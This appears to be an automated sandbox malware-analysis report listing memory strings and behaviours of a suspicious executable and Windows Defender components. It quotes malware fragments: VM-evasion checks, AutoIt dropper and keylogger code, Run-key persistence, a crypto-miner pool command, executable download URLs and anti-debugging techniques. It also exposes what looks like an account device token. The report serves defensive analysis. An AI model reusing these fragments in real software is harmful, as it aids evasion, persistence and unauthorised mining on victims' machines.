Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-armel.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.ISO.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-armel.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: MpSigStub.exe, 00000012.00000003.18627348155.000002DF229BA000.00000004.00000001.sdmp Binary or memory string: VMwareVMware
Source: mpam-728dfe11.exe, 00000011.00000003.18595017457.0000027770039000.00000004.00000001.sdmp Binary or memory string: [read : ToSubclass] boolean IsVirtualMachine = FALSE;
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VSV.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18225498885.0000021B4EEFC000.00000004.00000001.sdmp Binary or memory string: 0123456789ABCDEF0123456789abcdef\Device\\SystemRootcoroutinenewproxyLua 5.1_VERSIONpairsipairs__modekv_Gcreateresumerunningstatuswrapyieldpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_uses_single_steppingpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesizepea_dmg_unsupportedpea_dmg_importspea_dmg_invaliddatapea_dmg_decompresspea_
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-i386.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: Running on VMWare
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: %vmware
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: 3.%ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp Binary or memory string: if(((get-uiculture).name-match"ru|ua|by|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox|vmware|kvm")){exit;}
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp Binary or memory string: Virtual HD
Source: MpSigStub.exe, 0000000B.00000003.18305104252.0000021B5E24E000.00000004.00000001.sdmp Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox|vmware|virtualpc|sandbox|333333|home-off-d5f0ac|microsof-2c393f|123|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 0000000B.00000003.18321478947.0000021B5F112000.00000004.00000001.sdmp Binary or memory string: *.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-aarch64.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 00000012.00000003.19876400291.000002DF22A3D000.00000004.00000001.sdmp Binary or memory string: MSA_DeviceTickett=EwC4AlN5BAAUfXuGwOqhW7gpJJ36LAbhOJHjZ2kAAcSsRKt8ps1HbU+lbYp62KgixIlLnT5xVNUYmFgiZg7e2RSZvAXtkprrlFEiwRIxYBAVaF+0TT0fAxlAdW7pw9KXidv+ux3QP60AShLSgmycklECD4sCMAJVWqoFsRVSZJqfKaMe5L1dYmadxAB7t31ooFXtm3d/lpFn6vSieVQtb0SzS853TB7AqJZh8haYOHJX+cICNMab9AkT9aSQwSXElnsrYFrBhdW2S1ft6gz+YJj6ES88XfslacRUeBvO77oe+Bdkb3KiNFT+XsLg8UbipcMNOJBt96fEgqnllnnNAW98GxQ+WhyNwRcoI1HGxzTzu8AWEfs1wQbp0+8jBQgDZgAACIIsM7dN3b6OiAGCDYOxAbrOsaEV3IcZ1xCkXY/qQfLMzT9URManm6tej5fX612VHGfSiV4E1T+NBPw1Ckf7emdhzWCDggO0AUcQcSnOKtmsSV8h9tM+Tz8YA1OPs9ZWToQybrqgo1rQJXGd1NSS+osFLxZ7BxUkTcBzS/aScuafnWMzTl/Z0Ql2YWMb18DDT2tf8WrjwdKUgQF2nKQXpuJwtfB6a+IwKvXvizLVJXlX2w3HJ9+toYseVazq/Ig1qncXi0OsWCA7j0Fd6V8EsnCUqmmv+0NPfzRZZqVhFCezKqJRce9/wONqhtRIOTPMPsl+wISiqhk0OHIOGnpwUzH+CdJwli4Np1dbFeCfqqd71a+2Ziib0guf16qWZ0Xu/Tl+OmyJ9X6klAK+WOMkwFun/YxVBEREUbu7jP2Gdjawu3U92BSzPk06Nzhi1WVrQxOtIM0op+50hB50FveUnB8PPzJ3Ir5xdNamO72ffDki+ZpTGWTPv3HhSw0U6r3NEx5poZUUT0cKfn6RxkEpNyyAi7YB&p=
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: VBoxService.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18288234177.0000021B5E77E000.00000004.00000001.sdmp Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: =8*.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp Binary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: KF*.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.vhds.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-armel.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AB030 FindNextFileW,FindClose,FindFirstFileW, 18_2_00007FF7E30AB030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 18_2_00007FF7E30AADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30D2504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF7E30D2504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 18_2_00007FF7E305F810
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Thread information set: HideFromDebugger
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C3425 mov eax, dword ptr fs:[00000030h] 6_2_022C3425
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C1B55 mov eax, dword ptr fs:[00000030h] 6_2_022C1B55
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C0F9D mov eax, dword ptr fs:[00000030h] 6_2_022C0F9D
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B3BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF7E30B3BFC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B0B50 GetProcessHeap,HeapFree, 18_2_00007FF7E30B0B50
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30CB798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF7E30CB798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B3BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF7E30B3BFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30CBF4C SetUnhandledExceptionFilter, 18_2_00007FF7E30CBF4C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30CBD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF7E30CBD68

HIPS / PFW / Operating System Protection Evasion:

barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\4EDE279A-C0F0-19A6-1502-6263C94C7DB4.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process created: C:\Users\user\Desktop\1gPmnCR2PX.exe 'C:\Users\user\Desktop\1gPmnCR2PX.exe' Jump to behavior
Contains functionality to query the security center for anti-virus and firewall products
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: pwinmgmts:\\localhost\root\securitycenter
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: <select * from antivirusproduct
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/predator.ra2!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: = stringreplace ( "
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: " , "n" , "mi" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: chrw ( bitxor ( asc (
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: = stringreverse ( "utmbjghxrnjxmtb" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojandropper:win64/miner.rw!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: xdi_destroykey
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: xdi_shutdown
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: xdi_decryptdata
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: miner.kek.gay:443 --cpu-no-yield --asm=auto --cpu-memory-pool=-1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:win32/covitse.pi!msr
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: fileinstall ( "c:\users\fud\desktop\11111111\corona.exe" , @appdatadir & "\z11062600\corona.exe" , 1 )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: shellexecute ( @appdatadir & "\z11062600\corona.exe" , "" , @appdatadir & "\z11062600" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#hstr:allowlist:injector.autoit.mx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: #autoit3wrapper_res_field=companyname|genesis venture investment co., ltd.
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: wisest<wisest@vip.qq.com>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:virtool:win32/autinject.g!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $xor = bitxor ( $xor , $len + $ii )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: rtlupd64
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: execute ( "@appdatadir" ) & "\winlogons"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: startup ( "winlogons.exe" , "winlogons" , "+r" , "" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#trojan:win32/autoinjec.sa!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: l_imagesearcharea ( @appdatadir & "\microsoft\1\che.bmp
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: lrun ( @tempdir & "scratch.bat" , @tempdir , @sw_hide )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/autoitinject.s1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: enativ.com
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_local_machine\software\microsoft\windows\currentversion\runonce
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \enativ\4xnav12p.txt
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: = "http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/predator.ar_0109!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: global $sdeouljcvthbiisnlmbthiecg = execute
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: stringreplace ( "skxpyvmtnwvrovjagkuhnqvobgbtrkxpyvmtnwvrovjagkuhnqvobgbinkxpyv
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: vobgbnkxpyvmtnwvrovjagkuhnqvobgb" , "kxpyvmtnwvrovjagkuhnqvobgb" , "" ) )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: " & ".exe"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: = stringsplit ( tcuuq (
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alfper:clearlock!autoit
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $overlay = guicreate ( "clearlock" , @desktopwidth , @desktopheight ,
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: _blockinputex ( 3 , "[:alpha:]|[:number:]|{enter}|{backspace}
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:trojanspy:win32/keylogger.bad!bit
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: nlogfiles-" & $date & "-" & $pwd & ".htm
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: >func _logkeypress ( $what2log )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/autoitinject.aa!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dreturn execute ( "stringtobinary($
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: lexecute ( " bitxor($xxxxx, $i, $xx)" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: d= execute ( "mod($xxxxxxx, 256)" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: := execute ( "dllstructcreate(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/cryptedautoit.sq!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &while wingetprocess
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: if winclose =
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: return shellexecute ( @workingdir & chr ( 92 ) & $
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: & chr ( 92 ) & $
